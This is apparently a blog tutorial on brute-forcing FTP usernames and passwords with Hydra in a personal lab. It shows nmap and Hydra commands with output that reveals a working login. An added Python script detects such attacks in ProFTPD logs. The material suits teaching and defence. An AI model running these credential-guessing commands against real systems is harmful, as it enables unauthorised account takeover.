How to brute force FTP users and passwords with Hydra? Ethical Hacking in real life!

In this article we will look at further functionality of the security testing tool Hydra. In one of the previous articles we cracked a user password on a Linux system through SSH. In this example we do not know the exact username of any FTP user, so we will create a list of possible usernames alongside our password list. All of these operations happen in a personal lab.

Important note: hacking in the wild is illegal! Do NOT do it out of the lab, unless you are a penetration tester with a signed contract!

The hacker’s machine: Kali Linux [192.168.23.131]

The attacked machine: Debian Bullseye [192.168.23.133]

The two machines can see each other on the network.

The attacked machine runs an FTP server with password authentication.

How to brute force users and passwords

Step 1: let’s see if the FTP server is listening

We use nmap to check the open ports on the remote server.

┌──(kali㉿kali)-[~]
└─$ nmap 192.168.23.133
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-23 14:50 CET
Nmap scan report for 192.168.23.133
Host is up (0.00075s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh

Nmap done: 1 IP address (1 host up) scanned in 0.05 seconds

We can see that the FTP service is running on port 21.

Step 2: we use the power of Hydra to find a user and the password

Hydra can read user and password lists from files. In this exercise we use that feature to provide two files to the tool. Hydra will try every possible combination of the two dictionary files (every username with every password; 6 usernames and 131 passwords give the 786 login tries reported in the output below). If one of the combinations is valid, we learn both the username and the password of an FTP user.

┌──(kali㉿kali)-[~]
└─$ hydra -L top-users.txt -P top-auth-mistakes.txt 192.168.23.133 ftp
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-23 14:52:23
[DATA] max 16 tasks per 1 server, overall 16 tasks, 786 login tries (l:6/p:131), ~50 tries per task
[DATA] attacking ftp://192.168.23.133:21/
[21][ftp] host: 192.168.23.133   login: ftpuser   password: secret123
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-23 14:52:48

Hydra found a user with a valid password!
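From the defender's side, the run above has a clear signature in the server's own logs: hundreds of login attempts from a single client within a few seconds, followed by a success. The following Python script is an added example, not part of the original post. It parses constructed log lines written in ProFTPD's syslog style (the exact message wording is an assumption), flags any client IP that fails repeatedly inside a short window, and records a later successful login from that IP as the probable compromise.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime

# Constructed sample in ProFTPD's syslog style (wording assumed, not captured in the lab):
# one client fails repeatedly, then logs in; a second client fails only once.
SAMPLE_LOG = """\
Jan 23 14:52:24 debian proftpd[2101] debian (192.168.23.131[192.168.23.131]): USER admin: no such user found from 192.168.23.131 [192.168.23.131] to ::ffff:192.168.23.133:21
Jan 23 14:52:24 debian proftpd[2102] debian (192.168.23.131[192.168.23.131]): USER ftpuser (Login failed): Incorrect password
Jan 23 14:52:25 debian proftpd[2103] debian (192.168.23.131[192.168.23.131]): USER ftpuser (Login failed): Incorrect password
Jan 23 14:52:26 debian proftpd[2104] debian (192.168.23.131[192.168.23.131]): USER root (Login failed): Incorrect password
Jan 23 14:52:48 debian proftpd[2105] debian (192.168.23.131[192.168.23.131]): USER ftpuser: Login successful.
Jan 23 14:55:10 debian proftpd[2106] debian (192.168.23.140[192.168.23.140]): USER alice (Login failed): Incorrect password
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ proftpd\[\d+\] \S+ "
    r"\((?P<ip>[\d.]+)\[[\d.]+\]\): USER (?P<user>\S+?)(?P<rest>[: (].*)$"
)

def parse_line(line, year=2023):
    """Return (timestamp, client ip, username, 'fail'|'success') or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")  # syslog has no year
    if "Login successful" in m["rest"]:
        return ts, m["ip"], m["user"], "success"
    if "no such user" in m["rest"] or "Login failed" in m["rest"]:
        return ts, m["ip"], m["user"], "fail"
    return None  # other USER messages are not authentication results

def detect_bruteforce(log_text, threshold=3, window_seconds=60):
    """Flag client IPs with >= threshold failed logins inside a sliding window;
    a later success from a flagged IP is recorded as the probable compromise."""
    recent, total, alerts = defaultdict(list), Counter(), {}
    for ts, ip, user, outcome in filter(None, map(parse_line, log_text.splitlines())):
        if outcome == "fail":
            total[ip] += 1
            recent[ip] = [t for t in recent[ip] + [ts]
                          if (ts - t).total_seconds() <= window_seconds]
            if len(recent[ip]) >= threshold:
                alerts.setdefault(ip, {"first_flagged": ts, "success_as": None})
        elif ip in alerts:  # valid login right after a burst of failures
            alerts[ip]["success_as"] = user
    for ip in alerts:
        alerts[ip]["failures"] = total[ip]
    return alerts
```

Calling detect_bruteforce(SAMPLE_LOG) reports only 192.168.23.131: four failures in under a minute, followed by a successful login as ftpuser, while the single failure from 192.168.23.140 stays below the threshold.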

Step 3: log in to the FTP server

Now we can log in to the FTP server for further operations.

┌──(kali㉿kali)-[~]
└─$ ftp ftpuser@192.168.23.133
Connected to 192.168.23.133.
220 ProFTPD Server (Toms IT Cafe Vulnerable FTP) [::ffff:192.168.23.133]
331 Password required for ftpuser
Password: 
230 User ftpuser logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 

Final thoughts

For this presentation I used an insecurely configured ProFTPd server with general Linux users.

Please do NOT try this in the wild, on the internet. Hacking is illegal. If you want to play with this, do it in your own separate lab environment.

If you have anything to share then please visit my Tom’s IT Cafe Discord Server!
